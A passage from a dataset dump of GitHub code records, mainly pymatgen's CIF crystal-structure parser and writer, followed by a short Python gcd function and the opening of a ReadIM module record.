\"\"\"\n\n def __init__(self, filename, occupancy_tolerance=1., site_tolerance=1e-4):\n self._occupancy_tolerance = occupancy_tolerance\n self._site_tolerance = site_tolerance\n if isinstance(filename, six.string_types):\n self._cif = CifFile.from_file(filename)\n else:\n self._cif = CifFile.from_string(filename.read())\n\n # store if CIF contains features from non-core CIF dictionaries\n # e.g. magCIF\n self.feature_flags = {}\n\n def is_magcif():\n \"\"\"\n Checks to see if file appears to be a magCIF file (heuristic).\n \"\"\"\n # Doesn't seem to be a canonical way to test if file is magCIF or\n # not, so instead check for magnetic symmetry datanames\n prefixes = ['_space_group_magn', '_atom_site_moment', '_space_group_symop_magn']\n for d in self._cif.data.values():\n for k in d.data.keys():\n for prefix in prefixes:\n if prefix in k:\n return True\n return False\n\n self.feature_flags['magcif'] = is_magcif()\n\n def is_magcif_incommensurate():\n \"\"\"\n Checks to see if file contains an incommensurate magnetic\n structure (heuristic).\n \"\"\"\n # Doesn't seem to be a canonical way to test if magCIF file\n # describes incommensurate strucure or not, so instead check\n # for common datanames\n if not self.feature_flags[\"magcif\"]:\n return False\n prefixes = ['_cell_modulation_dimension', '_cell_wave_vector']\n for d in self._cif.data.values():\n for k in d.data.keys():\n for prefix in prefixes:\n if prefix in k:\n return True\n return False\n\n self.feature_flags['magcif_incommensurate'] = is_magcif_incommensurate()\n\n for k in self._cif.data.keys():\n # pass individual CifBlocks to _sanitize_data\n self._cif.data[k] = self._sanitize_data(self._cif.data[k])\n\n @staticmethod\n def from_string(cif_string, occupancy_tolerance=1.):\n \"\"\"\n Creates a CifParser from a string.\n\n Args:\n cif_string (str): String representation of a CIF.\n occupancy_tolerance (float): If total occupancy of a site is\n between 1 and occupancy_tolerance, the occupancies will be\n scaled down to 1.\n\n Returns:\n CifParser\n \"\"\"\n stream = cStringIO(cif_string)\n return CifParser(stream, occupancy_tolerance)\n\n def _sanitize_data(self, data):\n \"\"\"\n Some CIF files do not conform to spec. This function corrects\n known issues, particular in regards to Springer materials/\n Pauling files.\n\n This function is here so that CifParser can assume its\n input conforms to spec, simplifying its implementation.\n :param data: CifBlock\n :return: data CifBlock\n \"\"\"\n\n \"\"\"\n This part of the code deals with handling formats of data as found in\n CIF files extracted from the Springer Materials/Pauling File\n databases, and that are different from standard ICSD formats.\n \"\"\"\n\n # Check to see if \"_atom_site_type_symbol\" exists, as some test CIFs do\n # not contain this key.\n if \"_atom_site_type_symbol\" in data.data.keys():\n\n # Keep a track of which data row needs to be removed.\n # Example of a row: Nb,Zr '0.8Nb + 0.2Zr' .2a .m-3m 0 0 0 1 14\n # 'rhombic dodecahedron, Nb14'\n # Without this code, the above row in a structure would be parsed\n # as an ordered site with only Nb (since\n # CifParser would try to parse the first two characters of the\n # label \"Nb,Zr\") and occupancy=1.\n # However, this site is meant to be a disordered site with 0.8 of\n # Nb and 0.2 of Zr.\n idxs_to_remove = []\n\n new_atom_site_label = []\n new_atom_site_type_symbol = []\n new_atom_site_occupancy = []\n new_fract_x = []\n new_fract_y = []\n new_fract_z = []\n\n for idx, el_row in enumerate(data[\"_atom_site_label\"]):\n\n # CIF files from the Springer Materials/Pauling File have\n # switched the label and symbol. Thus, in the\n # above shown example row, '0.8Nb + 0.2Zr' is the symbol.\n # Below, we split the strings on ' + ' to\n # check if the length (or number of elements) in the label and\n # symbol are equal.\n if len(data[\"_atom_site_type_symbol\"][idx].split(' + ')) > \\\n len(data[\"_atom_site_label\"][idx].split(' + ')):\n\n # Dictionary to hold extracted elements and occupancies\n els_occu = {}\n\n # parse symbol to get element names and occupancy and store\n # in \"els_occu\"\n symbol_str = data[\"_atom_site_type_symbol\"][idx]\n symbol_str_lst = symbol_str.split(' + ')\n for elocc_idx in range(len(symbol_str_lst)):\n # Remove any bracketed items in the string\n symbol_str_lst[elocc_idx] = re.sub(r'\\([0-9]*\\)', '',\n symbol_str_lst[elocc_idx].strip())\n\n # Extract element name and its occupancy from the\n # string, and store it as a\n # key-value pair in \"els_occ\".\n els_occu[str(re.findall(r'\\D+', symbol_str_lst[\n elocc_idx].strip())[1]).replace('', '')] = \\\n float('0' + re.findall(r'\\.?\\d+', symbol_str_lst[\n elocc_idx].strip())[1])\n\n x = str2float(data[\"_atom_site_fract_x\"][idx])\n y = str2float(data[\"_atom_site_fract_y\"][idx])\n z = str2float(data[\"_atom_site_fract_z\"][idx])\n\n for et, occu in els_occu.items():\n # new atom site labels have 'fix' appended\n new_atom_site_label.append(et + '_fix' + str(len(new_atom_site_label)))\n new_atom_site_type_symbol.append(et)\n new_atom_site_occupancy.append(str(occu))\n new_fract_x.append(str(x))\n new_fract_y.append(str(y))\n new_fract_z.append(str(z))\n\n idxs_to_remove.append(idx)\n\n # Remove the original row by iterating over all keys in the CIF\n # data looking for lists, which indicates\n # multiple data items, one for each row, and remove items from the\n # list that corresponds to the removed row,\n # so that it's not processed by the rest of this function (which\n # would result in an error).\n for original_key in data.data:\n if isinstance(data.data[original_key], list):\n for id in sorted(idxs_to_remove, reverse=True):\n del data.data[original_key][id]\n\n if len(idxs_to_remove) > 0:\n data.data[\"_atom_site_label\"] += new_atom_site_label\n data.data[\"_atom_site_type_symbol\"] += new_atom_site_type_symbol\n data.data[\"_atom_site_occupancy\"] += new_atom_site_occupancy\n data.data[\"_atom_site_fract_x\"] += new_fract_x\n data.data[\"_atom_site_fract_y\"] += new_fract_y\n data.data[\"_atom_site_fract_z\"] += new_fract_z\n\n \"\"\"\n This fixes inconsistencies in naming of several magCIF tags\n as a result of magCIF being in widespread use prior to\n specification being finalized (on advice of Branton Campbell).\n \"\"\"\n\n if self.feature_flags[\"magcif\"]:\n\n # CIF-1 style has all underscores, interim standard\n # had period before magn instead of before the final\n # component (e.g. xyz)\n correct_keys = [\"_space_group_symop_magn_operation.xyz\",\n \"_space_group_symop_magn_centering.xyz\",\n \"_space_group_magn.name_BNS\",\n \"_space_group_magn.number_BNS\"]\n\n # cannot mutate OrderedDict during enumeration,\n # so store changes we want to make\n changes_to_make = {}\n\n for original_key in data.data:\n for correct_key in correct_keys:\n # convert to all underscore\n trial_key = \"_\".join(correct_key.split(\".\"))\n test_key = \"_\".join(original_key.split(\".\"))\n if trial_key == test_key:\n changes_to_make[correct_key] = original_key\n\n # make changes\n for correct_key, original_key in changes_to_make.items():\n data.data[correct_key] = data.data[original_key]\n\n # some keys have been renamed, renamed_keys maps interim_keys to final_keys\n renamed_keys = {\"_magnetic_space_group.transform_to_standard_Pp_abc\":\n \"_space_group_magn.transform_BNS_Pp_abc\"}\n changes_to_make = {}\n\n for interim_key, final_key in renamed_keys.items():\n if data.data.get(interim_key):\n changes_to_make[final_key] = interim_key\n for final_key, interim_key in changes_to_make.items():\n data.data[final_key] = data.data[interim_key]\n\n return data\n\n def _unique_coords(self, coords_in, magmoms_in=None):\n \"\"\"\n Generate unique coordinates using coord and symmetry positions\n and also their corresponding magnetic moments, if supplied.\n \"\"\"\n coords = []\n if magmoms_in:\n magmoms = []\n magmoms_in = [Magmom(magmom) for magmom in magmoms_in]\n if len(magmoms_in) != len(coords_in):\n raise ValueError\n for tmp_coord, tmp_magmom in zip(coords_in, magmoms_in):\n for op in self.symmetry_operations:\n coord = op.operate(tmp_coord)\n coord = np.array([i - math.floor(i) for i in coord])\n if isinstance(op, MagSymmOp):\n magmom = Magmom(op.operate_magmom(tmp_magmom.moment))\n else:\n magmom = tmp_magmom\n if not in_coord_list_pbc(coords, coord,\n atol=self._site_tolerance):\n coords.append(coord)\n magmoms.append(magmom)\n return coords, magmoms\n else:\n for tmp_coord in coords_in:\n for op in self.symmetry_operations:\n coord = op.operate(tmp_coord)\n coord = np.array([i - math.floor(i) for i in coord])\n if not in_coord_list_pbc(coords, coord,\n atol=self._site_tolerance):\n coords.append(coord)\n return coords, [Magmom(0)]*len(coords) # return dummy magmoms\n\n def get_lattice(self, data, length_strings=(\"a\", \"b\", \"c\"),\n angle_strings=(\"alpha\", \"beta\", \"gamma\"),\n lattice_type=None):\n \"\"\"\n Generate the lattice from the provided lattice parameters. In\n the absence of all six lattice parameters, the crystal system\n and necessary parameters are parsed\n \"\"\"\n try:\n\n lengths = [str2float(data[\"_cell_length_\" + i])\n for i in length_strings]\n angles = [str2float(data[\"_cell_angle_\" + i])\n for i in angle_strings]\n if not lattice_type:\n return Lattice.from_lengths_and_angles(lengths, angles)\n\n else:\n return getattr(Lattice, lattice_type)(*(lengths + angles))\n\n except KeyError:\n # Missing Key search for cell setting\n for lattice_lable in [\"_symmetry_cell_setting\",\n \"_space_group_crystal_system\"]:\n if data.data.get(lattice_lable):\n lattice_type = data.data.get(lattice_lable).lower()\n try:\n\n required_args = getargspec(\n getattr(Lattice, lattice_type)).args\n\n lengths = (l for l in length_strings\n if l in required_args)\n angles = (a for a in angle_strings\n if a in required_args)\n return self.get_lattice(data, lengths, angles,\n lattice_type=lattice_type)\n except AttributeError as exc:\n warnings.warn(exc)\n\n else:\n return None\n\n def get_symops(self, data):\n \"\"\"\n In order to generate symmetry equivalent positions, the symmetry\n operations are parsed. If the symops are not present, the space\n group symbol is parsed, and symops are generated.\n \"\"\"\n symops = []\n for symmetry_label in [\"_symmetry_equiv_pos_as_xyz\",\n \"_symmetry_equiv_pos_as_xyz_\",\n \"_space_group_symop_operation_xyz\",\n \"_space_group_symop_operation_xyz_\"]:\n if data.data.get(symmetry_label):\n xyz = data.data.get(symmetry_label)\n if isinstance(xyz, six.string_types):\n warnings.warn(\"A 1-line symmetry op P1 CIF is detected!\")\n xyz = [xyz]\n try:\n symops = [SymmOp.from_xyz_string(s)\n for s in xyz]\n break\n except ValueError:\n continue\n if not symops:\n # Try to parse symbol\n for symmetry_label in [\"_symmetry_space_group_name_H-M\",\n \"_symmetry_space_group_name_H_M\",\n \"_symmetry_space_group_name_H-M_\",\n \"_symmetry_space_group_name_H_M_\",\n \"_space_group_name_Hall\",\n \"_space_group_name_Hall_\",\n \"_space_group_name_H-M_alt\",\n \"_space_group_name_H-M_alt_\",\n \"_symmetry_space_group_name_hall\",\n \"_symmetry_space_group_name_hall_\",\n \"_symmetry_space_group_name_h-m\",\n \"_symmetry_space_group_name_h-m_\"]:\n sg = data.data.get(symmetry_label)\n\n if sg:\n sg = sub_spgrp(sg)\n try:\n spg = space_groups.get(sg)\n if spg:\n symops = SpaceGroup(spg).symmetry_ops\n warnings.warn(\n \"No _symmetry_equiv_pos_as_xyz type key found. \"\n \"Spacegroup from %s used.\" % symmetry_label)\n break\n except ValueError:\n # Ignore any errors\n pass\n\n try:\n for d in _get_cod_data():\n if sg == re.sub(r\"\\s+\", \"\",\n d[\"hermann_mauguin\"]):\n xyz = d[\"symops\"]\n symops = [SymmOp.from_xyz_string(s)\n for s in xyz]\n warnings.warn(\n \"No _symmetry_equiv_pos_as_xyz type key found. \"\n \"Spacegroup from %s used.\" % symmetry_label)\n break\n except Exception as ex:\n continue\n\n if symops:\n break\n if not symops:\n # Try to parse International number\n for symmetry_label in [\"_space_group_IT_number\",\n \"_space_group_IT_number_\",\n \"_symmetry_Int_Tables_number\",\n \"_symmetry_Int_Tables_number_\"]:\n if data.data.get(symmetry_label):\n try:\n i = int(str2float(data.data.get(symmetry_label)))\n symops = SpaceGroup.from_int_number(i).symmetry_ops\n break\n except ValueError:\n continue\n\n if not symops:\n warnings.warn(\"No _symmetry_equiv_pos_as_xyz type key found. \"\n \"Defaulting to P1.\")\n symops = [SymmOp.from_xyz_string(s) for s in ['x', 'y', 'z']]\n\n return symops\n\n def get_magsymops(self, data):\n \"\"\"\n Equivalent to get_symops except for magnetic symmetry groups.\n Separate function since additional operation for time reversal symmetry\n (which changes magnetic moments on sites) needs to be returned.\n \"\"\"\n magsymmops = []\n\n # check to see if magCIF file explicitly contains magnetic symmetry operations\n if data.data.get(\"_space_group_symop_magn_operation.xyz\"):\n\n xyzt = data.data.get(\"_space_group_symop_magn_operation.xyz\")\n if isinstance(xyzt, six.string_types):\n xyzt = [xyzt]\n magsymmops = [MagSymmOp.from_xyzt_string(s) for s in xyzt]\n\n if data.data.get(\"_space_group_symop_magn_centering.xyz\"):\n\n xyzt = data.data.get(\"_space_group_symop_magn_centering.xyz\")\n if isinstance(xyzt, six.string_types):\n xyzt = [xyzt]\n centering_symops = [MagSymmOp.from_xyzt_string(s) for s in xyzt]\n\n all_ops = []\n for op in magsymmops:\n for centering_op in centering_symops:\n new_translation = [i - np.floor(i) for i\n in op.translation_vector + centering_op.translation_vector]\n new_time_reversal = op.time_reversal * centering_op.time_reversal\n all_ops.append(MagSymmOp.from_rotation_and_translation_and_time_reversal(\n rotation_matrix=op.rotation_matrix, translation_vec=new_translation,\n time_reversal=new_time_reversal))\n magsymmops = all_ops\n\n # else check to see if it specifies a magnetic space group\n elif data.data.get(\"_space_group_magn.name_BNS\") or data.data.get(\"_space_group_magn.number_BNS\"):\n\n if data.data.get(\"_space_group_magn.name_BNS\"):\n # get BNS label for MagneticSpaceGroup()\n id = data.data.get(\"_space_group_magn.name_BNS\")\n else:\n # get BNS number for MagneticSpaceGroup()\n # by converting string to list of ints\n id = list(map(int, (data.data.get(\"_space_group_magn.number_BNS\").split(\".\"))))\n\n msg = MagneticSpaceGroup(id)\n\n if data.data.get(\"_space_group_magn.transform_BNS_Pp_abc\"):\n if data.data.get(\"_space_group_magn.transform_BNS_Pp_abc\") != \"a,b,c;0,0,0\":\n return NotImplementedError(\"Non-standard settings not currently supported.\")\n elif data.data.get(\"_space_group_magn.transform_BNS_Pp\"):\n return NotImplementedError(\"Incomplete specification to implement.\")\n\n magsymmops = msg.symmetry_ops\n\n if not magsymmops:\n warnings.warn(\"No magnetic symmetry detected, using primitive symmetry.\")\n magsymmops = [MagSymmOp.from_xyzt_string(\"x, y, z, 1\")]\n\n return magsymmops\n\n def parse_oxi_states(self, data):\n \"\"\"\n Parse oxidation states from data dictionary\n \"\"\"\n try:\n oxi_states = {\n data[\"_atom_type_symbol\"][i]:\n str2float(data[\"_atom_type_oxidation_number\"][i])\n for i in range(len(data[\"_atom_type_symbol\"]))}\n # attempt to strip oxidation state from _atom_type_symbol\n # in case the label does not contain an oxidation state\n for i, symbol in enumerate(data[\"_atom_type_symbol\"]):\n oxi_states[re.sub(r\"\\d?[\\+,\\-]?$\", \"\", symbol)] = \\\n str2float(data[\"_atom_type_oxidation_number\"][i])\n\n except (ValueError, KeyError):\n oxi_states = None\n return oxi_states\n\n def parse_magmoms(self, data, lattice=None):\n \"\"\"\n Parse atomic magnetic moments from data dictionary\n \"\"\"\n if lattice is None:\n raise Exception('Magmoms given in terms of crystal axes in magCIF spec.')\n try:\n magmoms = {\n data[\"_atom_site_moment_label\"][i]:\n Magmom.from_moment_relative_to_crystal_axes([str2float(data[\"_atom_site_moment_crystalaxis_x\"][i]),\n str2float(data[\"_atom_site_moment_crystalaxis_y\"][i]),\n str2float(data[\"_atom_site_moment_crystalaxis_z\"][i])],\n lattice)\n for i in range(len(data[\"_atom_site_moment_label\"]))\n }\n except (ValueError, KeyError):\n return None\n return magmoms\n\n def _get_structure(self, data, primitive):\n \"\"\"\n Generate structure from part of the cif.\n \"\"\"\n\n def parse_symbol(sym):\n # Common representations for elements/water in cif files\n # TODO: fix inconsistent handling of water\n special = {\"D\": \"D\", \"Hw\": \"H\", \"Ow\": \"O\", \"Wat\": \"O\",\n \"wat\": \"O\", \"OH\": \"\", \"OH2\": \"\"}\n m = re.findall(r\"w?[A-Z][a-z]*\", sym)\n if m and m != \"?\":\n if sym in special:\n v = special[sym]\n else:\n v = special.get(m[0], m[0])\n if len(m) > 1 or (m[0] in special):\n warnings.warn(\"{} parsed as {}\".format(sym, v))\n return v\n\n lattice = self.get_lattice(data)\n\n # if magCIF, get magnetic symmetry moments and magmoms\n # else standard CIF, and use empty magmom dict\n if self.feature_flags[\"magcif_incommensurate\"]:\n raise NotImplementedError(\"Incommensurate structures not currently supported.\")\n elif self.feature_flags[\"magcif\"]:\n self.symmetry_operations = self.get_magsymops(data)\n magmoms = self.parse_magmoms(data, lattice=lattice)\n else:\n self.symmetry_operations = self.get_symops(data)\n magmoms = {}\n\n oxi_states = self.parse_oxi_states(data)\n\n coord_to_species = OrderedDict()\n coord_to_magmoms = OrderedDict()\n\n def get_matching_coord(coord):\n keys = list(coord_to_species.keys())\n coords = np.array(keys)\n for op in self.symmetry_operations:\n c = op.operate(coord)\n inds = find_in_coord_list_pbc(coords, c, atol=self._site_tolerance)\n # cant use if inds, because python is dumb and np.array([0]) evaluates\n # to False\n if len(inds):\n return keys[inds[0]]\n return False\n\n for i in range(len(data[\"_atom_site_label\"])):\n try:\n # If site type symbol exists, use it. Otherwise, we use the\n # label.\n symbol = parse_symbol(data[\"_atom_site_type_symbol\"][i])\n except KeyError:\n symbol = parse_symbol(data[\"_atom_site_label\"][i])\n if not symbol:\n continue\n\n if oxi_states is not None:\n o_s = oxi_states.get(symbol, 0)\n # use _atom_site_type_symbol if possible for oxidation state\n if \"_atom_site_type_symbol\" in data.data.keys():\n oxi_symbol = data[\"_atom_site_type_symbol\"][i]\n o_s = oxi_states.get(oxi_symbol, o_s)\n try:\n el = Specie(symbol, o_s)\n except:\n el = DummySpecie(symbol, o_s)\n else:\n el = get_el_sp(symbol)\n\n x = str2float(data[\"_atom_site_fract_x\"][i])\n y = str2float(data[\"_atom_site_fract_y\"][i])\n z = str2float(data[\"_atom_site_fract_z\"][i])\n magmom = magmoms.get(data[\"_atom_site_label\"][i], Magmom(0))\n\n try:\n occu = str2float(data[\"_atom_site_occupancy\"][i])\n except (KeyError, ValueError):\n occu = 1\n\n if occu > 0:\n coord = (x, y, z)\n match = get_matching_coord(coord)\n if not match:\n coord_to_species[coord] = Composition({el: occu})\n coord_to_magmoms[coord] = magmom\n else:\n coord_to_species[match] += {el: occu}\n coord_to_magmoms[match] = None # disordered magnetic not currently supported\n\n sum_occu = [sum(c.values()) for c in coord_to_species.values()]\n if any([o > 1 for o in sum_occu]):\n warnings.warn(\"Some occupancies (%s) sum to > 1! If they are within \"\n \"the tolerance, they will be rescaled.\" % str(sum_occu))\n\n allspecies = []\n allcoords = []\n allmagmoms = []\n\n # check to see if magCIF file is disordered\n if self.feature_flags[\"magcif\"]:\n for k, v in coord_to_magmoms.items():\n if v is None:\n # Proposed solution to this is to instead store magnetic moments\n # as Specie 'spin' property, instead of site property, but this\n # introduces ambiguities for end user (such as unintended use of\n # `spin` and Specie will have fictious oxidation state).\n raise NotImplementedError('Disordered magnetic structures not currently supported.')\n\n if coord_to_species.items():\n for species, group in groupby(\n sorted(list(coord_to_species.items()), key=lambda x: x[1]),\n key=lambda x: x[1]):\n tmp_coords = [site[0] for site in group]\n tmp_magmom = [coord_to_magmoms[tmp_coord] for tmp_coord in tmp_coords]\n\n if self.feature_flags[\"magcif\"]:\n coords, magmoms = self._unique_coords(tmp_coords, tmp_magmom)\n else:\n coords, magmoms = self._unique_coords(tmp_coords)\n\n allcoords.extend(coords)\n allspecies.extend(len(coords) * [species])\n allmagmoms.extend(magmoms)\n\n # rescale occupancies if necessary\n for i, species in enumerate(allspecies):\n totaloccu = sum(species.values())\n if 1 < totaloccu <= self._occupancy_tolerance:\n allspecies[i] = species / totaloccu\n\n if allspecies and len(allspecies) == len(allcoords) and len(allspecies) == len(allmagmoms):\n\n if self.feature_flags[\"magcif\"]:\n struct = Structure(lattice, allspecies, allcoords,\n site_properties={\"magmom\": allmagmoms})\n else:\n struct = Structure(lattice, allspecies, allcoords)\n\n struct = struct.get_sorted_structure()\n\n if primitive:\n struct = struct.get_primitive_structure()\n struct = struct.get_reduced_structure()\n return struct\n\n def get_structures(self, primitive=True):\n \"\"\"\n Return list of structures in CIF file. primitive boolean sets whether a\n conventional cell structure or primitive cell structure is returned.\n\n Args:\n primitive (bool): Set to False to return conventional unit cells.\n Defaults to True.\n\n Returns:\n List of Structures.\n \"\"\"\n structures = []\n for d in self._cif.data.values():\n try:\n s = self._get_structure(d, primitive)\n if s:\n structures.append(s)\n except (KeyError, ValueError) as exc:\n # Warn the user (Errors should never pass silently)\n # A user reported a problem with cif files produced by Avogadro\n # in which the atomic coordinates are in Cartesian coords.\n warnings.warn(str(exc))\n if len(structures) == 0:\n raise ValueError(\"Invalid cif file with no structures!\")\n return structures\n\n def get_bibtex_strings(self):\n \"\"\"\n (Beta) Get BibTeX reference from CIF file.\n :param data:\n :return: BibTeX string\n \"\"\"\n\n # TODO: CIF specification supports multiple citations.\n\n bibtex_strs = []\n\n for d in self._cif.data.values():\n\n bibtex_entry = {'authors': '_citation_author_name',\n 'title': '_citation_title',\n 'journal': '_citation_journal_abbrev',\n 'volume': '_citation_journal_volume',\n 'year': '_citation_year',\n 'number': '_citation_number',\n 'page_first': '_citation_page_first',\n 'page_last': '_citation_page_last',\n 'doi': '_citation_DOI'}\n\n for field, tag in bibtex_entry.items():\n try:\n bibtex_entry[field] = d[tag]\n except:\n bibtex_entry[field] = \"?\"\n\n bibtex_entry['key'] = bibtex_entry['authors'][0].split(',')[0]+\":\"+bibtex_entry['year']\n bibtex_entry['key'] = ''.join(bibtex_entry['key'].split())\n bibtex_entry['authors'] = \" and \".join(bibtex_entry['authors'])\n bibtex_entry['pages'] = \"{0}--{1}\".format(bibtex_entry['page_first'], bibtex_entry['page_last'])\n\n for field, entry in bibtex_entry.items():\n if field is not 'key':\n bibtex_entry[field] = \"{\"+entry+\"}\"\n\n bibtex_str = (\"\"\"{key},\n author = {authors},\n title = {title},\n journal = {journal},\n year = {year},\n volume = {volume},\n number = {number},\n pages = {pages},\n doi = {doi}\"\"\".format(**bibtex_entry))\n bibtex_strs.append(\"@article{\"+bibtex_str+\"\\n}\")\n\n return bibtex_strs\n\n def as_dict(self):\n d = OrderedDict()\n for k, v in self._cif.data.items():\n d[k] = {}\n for k2, v2 in v.data.items():\n d[k][k2] = v2\n return d\n\n\nclass CifWriter(object):\n\n def __init__(self, struct, symprec=None, write_magmoms=False):\n \"\"\"\n A wrapper around CifFile to write CIF files from pymatgen structures.\n\n Args:\n struct (Structure): structure to write\n symprec (float): If not none, finds the symmetry of the structure\n and writes the cif with symmetry information. Passes symprec\n to the SpacegroupAnalyzer\n write_magmoms (bool): If True, will write magCIF file. Incompatible\n with symprec\n \"\"\"\n\n if write_magmoms and symprec:\n warnings.warn(\"Magnetic symmetry cannot currently be detected by pymatgen.\")\n symprec = None\n\n format_str = \"{:.8f}\"\n\n block = OrderedDict()\n loops = []\n spacegroup = (\"P 1\", 1)\n if symprec is not None:\n sf = SpacegroupAnalyzer(struct, symprec)\n spacegroup = (sf.get_space_group_symbol(),\n sf.get_space_group_number())\n # Needs the refined struture when using symprec. This converts\n # primitive to conventional structures, the standard for CIF.\n struct = sf.get_refined_structure()\n\n latt = struct.lattice\n comp = struct.composition\n no_oxi_comp = comp.element_composition\n block[\"_symmetry_space_group_name_H-M\"] = spacegroup[0]\n for cell_attr in ['a', 'b', 'c']:\n block[\"_cell_length_\" + cell_attr] = format_str.format(\n getattr(latt, cell_attr))\n for cell_attr in ['alpha', 'beta', 'gamma']:\n block[\"_cell_angle_\" + cell_attr] = format_str.format(\n getattr(latt, cell_attr))\n block[\"_symmetry_Int_Tables_number\"] = spacegroup[1]\n block[\"_chemical_formula_structural\"] = no_oxi_comp.reduced_formula\n block[\"_chemical_formula_sum\"] = no_oxi_comp.formula\n block[\"_cell_volume\"] = latt.volume.__str__()\n\n reduced_comp, fu = no_oxi_comp.get_reduced_composition_and_factor()\n block[\"_cell_formula_units_Z\"] = str(int(fu))\n\n if symprec is None:\n block[\"_symmetry_equiv_pos_site_id\"] = [\"1\"]\n block[\"_symmetry_equiv_pos_as_xyz\"] = [\"x, y, z\"]\n else:\n sf = SpacegroupAnalyzer(struct, symprec)\n\n symmops = []\n for op in sf.get_symmetry_operations():\n v = op.translation_vector\n symmops.append(SymmOp.from_rotation_and_translation(\n op.rotation_matrix, v))\n\n ops = [op.as_xyz_string() for op in symmops]\n block[\"_symmetry_equiv_pos_site_id\"] = \\\n [\"%d\" % i for i in range(1, len(ops) + 1)]\n block[\"_symmetry_equiv_pos_as_xyz\"] = ops\n\n loops.append([\"_symmetry_equiv_pos_site_id\",\n \"_symmetry_equiv_pos_as_xyz\"])\n\n contains_oxidation = True\n try:\n symbol_to_oxinum = OrderedDict([\n (el.__str__(),\n float(el.oxi_state))\n for el in sorted(comp.elements)])\n except AttributeError:\n symbol_to_oxinum = OrderedDict([(el.symbol, 0) for el in\n sorted(comp.elements)])\n contains_oxidation = False\n if contains_oxidation:\n block[\"_atom_type_symbol\"] = symbol_to_oxinum.keys()\n block[\"_atom_type_oxidation_number\"] = symbol_to_oxinum.values()\n loops.append([\"_atom_type_symbol\", \"_atom_type_oxidation_number\"])\n\n atom_site_type_symbol = []\n atom_site_symmetry_multiplicity = []\n atom_site_fract_x = []\n atom_site_fract_y = []\n atom_site_fract_z = []\n atom_site_label = []\n atom_site_occupancy = []\n atom_site_moment_label = []\n atom_site_moment_crystalaxis_x = []\n atom_site_moment_crystalaxis_y = []\n atom_site_moment_crystalaxis_z = []\n count = 1\n if symprec is None:\n for site in struct:\n for sp, occu in sorted(site.species_and_occu.items()):\n atom_site_type_symbol.append(sp.__str__())\n atom_site_symmetry_multiplicity.append(\"1\")\n atom_site_fract_x.append(\"{0:f}\".format(site.a))\n atom_site_fract_y.append(\"{0:f}\".format(site.b))\n atom_site_fract_z.append(\"{0:f}\".format(site.c))\n atom_site_label.append(\"{}{}\".format(sp.symbol, count))\n atom_site_occupancy.append(occu.__str__())\n\n magmom = site.properties.get('magmom', Magmom(0))\n moment = Magmom.get_moment_relative_to_crystal_axes(magmom, latt)\n if write_magmoms and abs(magmom) > 0:\n atom_site_moment_label.append(\"{}{}\".format(sp.symbol, count))\n atom_site_moment_crystalaxis_x.append(moment[0])\n atom_site_moment_crystalaxis_y.append(moment[1])\n atom_site_moment_crystalaxis_z.append(moment[2])\n\n count += 1\n else:\n # The following just presents a deterministic ordering.\n unique_sites = [\n (sorted(sites, key=lambda s: tuple([abs(x) for x in\n s.frac_coords]))[0],\n len(sites))\n for sites in sf.get_symmetrized_structure().equivalent_sites\n ]\n for site, mult in sorted(\n unique_sites,\n key=lambda t: (t[0].species_and_occu.average_electroneg,\n -t[1], t[0].a, t[0].b, t[0].c)):\n for sp, occu in site.species_and_occu.items():\n atom_site_type_symbol.append(sp.__str__())\n atom_site_symmetry_multiplicity.append(\"%d\" % mult)\n atom_site_fract_x.append(\"{0:f}\".format(site.a))\n atom_site_fract_y.append(\"{0:f}\".format(site.b))\n atom_site_fract_z.append(\"{0:f}\".format(site.c))\n atom_site_label.append(\"{}{}\".format(sp.symbol, count))\n atom_site_occupancy.append(occu.__str__())\n count += 1\n\n block[\"_atom_site_type_symbol\"] = atom_site_type_symbol\n block[\"_atom_site_label\"] = atom_site_label\n block[\"_atom_site_symmetry_multiplicity\"] = \\\n atom_site_symmetry_multiplicity\n block[\"_atom_site_fract_x\"] = atom_site_fract_x\n block[\"_atom_site_fract_y\"] = atom_site_fract_y\n block[\"_atom_site_fract_z\"] = atom_site_fract_z\n block[\"_atom_site_occupancy\"] = atom_site_occupancy\n loops.append([\"_atom_site_type_symbol\",\n \"_atom_site_label\",\n \"_atom_site_symmetry_multiplicity\",\n \"_atom_site_fract_x\",\n \"_atom_site_fract_y\",\n \"_atom_site_fract_z\",\n \"_atom_site_occupancy\"])\n if write_magmoms:\n block[\"_atom_site_moment_label\"] = atom_site_moment_label\n block[\"_atom_site_moment_crystalaxis_x\"] = atom_site_moment_crystalaxis_x\n block[\"_atom_site_moment_crystalaxis_y\"] = atom_site_moment_crystalaxis_y\n block[\"_atom_site_moment_crystalaxis_z\"] = atom_site_moment_crystalaxis_z\n loops.append([\"_atom_site_moment_label\",\n \"_atom_site_moment_crystalaxis_x\",\n \"_atom_site_moment_crystalaxis_y\",\n \"_atom_site_moment_crystalaxis_z\"])\n d = OrderedDict()\n d[comp.reduced_formula] = CifBlock(block, loops, comp.reduced_formula)\n self._cf = CifFile(d)\n\n def __str__(self):\n \"\"\"\n Returns the cif as a string.\n \"\"\"\n return self._cf.__str__()\n\n def write_file(self, filename):\n \"\"\"\n Write the cif file.\n \"\"\"\n with zopen(filename, \"wt\") as f:\n f.write(self.__str__())\n\n\ndef str2float(text):\n \"\"\"\n Remove uncertainty brackets from strings and return the float.\n \"\"\"\n\n try:\n return float(re.sub(r\"\\(.+\\)\", \"\", text))\n except TypeError:\n if isinstance(text, list) and len(text) == 1:\n return float(re.sub(r\"\\(.+\\)\", \"\", text[0]))\n except ValueError as ex:\n if text.strip() == \".\":\n return 0\n raise ex\n","repo_name":"comscope/ComDMFT","sub_path":"ComRISB/pyextern/pymatgen/pymatgen/io/cif.py","file_name":"cif.py","file_ext":"py","file_size_in_byte":50333,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"86"} +{"seq_id":"39930639313","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Feb 1 17:00:37 2020\r\n\r\n@author: ansar\r\n\"\"\"\r\n\r\ndef gcd(m,n):\r\n fm=[]\r\n for i in range(1,m+1):\r\n if(m%i==0):\r\n fm.append(i)\r\n \r\n fn=[]\r\n for j in range(1,n+1):\r\n if(n%j==0):\r\n fn.append(j)\r\n \r\n fc=[]\r\n for c in fm:\r\n if c in fn:\r\n fc.append(c)\r\n \r\n return(fc[-1]) \r\n \r\nprint(gcd(14,63)) ","repo_name":"SameerAnsari1204/python","sub_path":"gcd.py","file_name":"gcd.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"26616263841","text":"\"\"\"\nReadIM: A fast DaVis8 file reader and writer for 